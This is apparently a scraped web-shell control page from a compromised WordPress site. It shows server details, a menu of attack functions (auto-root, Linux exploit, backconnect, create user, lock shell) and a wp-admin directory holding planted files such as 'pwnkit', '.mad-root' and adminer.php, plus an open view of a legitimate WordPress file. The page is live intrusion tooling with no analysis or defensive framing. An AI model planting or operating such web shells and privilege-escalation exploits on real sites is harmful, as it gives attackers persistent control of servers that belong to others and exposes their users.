Linux webd123.cluster006.gra.hosting.ovh.net 5.15.162-ovh-vps-grsec-zfs-classid #1 SMP Mon Jul 15 08:28:44 UTC 2024 x86_64
Apache
: 10.6.40.122 | : 216.73.216.128
Cant Read [ /etc/named.conf ]
5.4.45
zouerate
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
zouerate /
thehappyfactory.eu /
wp-admin /
user /
[ HOME SHELL ]
Name
Size
Permission
Action
wp-admin
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw-r--r--
about.php
237
B
-rw-r--r--
admin.php
651
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
credits.php
241
B
-rw-r--r--
freedoms.php
243
B
-rw-r--r--
index.php
638
B
-rw-r--r--
menu.php
671
B
-rw-r--r--
profile.php
185
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
user-edit.php
183
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : admin.php
<?php /** * WordPress User Administration Bootstrap * * @package WordPress * @subpackage Administration * @since 3.1.0 */ define('WP_USER_ADMIN', true); require_once( dirname(dirname(__FILE__)) . '/admin.php'); if ( ! is_multisite() ) { wp_redirect( admin_url() ); exit; } $redirect_user_admin_request = ( ( $current_blog->domain != $current_site->domain ) || ( $current_blog->path != $current_site->path ) ); $redirect_user_admin_request = apply_filters( 'redirect_user_admin_request', $redirect_user_admin_request ); if ( $redirect_user_admin_request ) { wp_redirect( user_admin_url() ); exit; } unset( $redirect_user_admin_request );
Close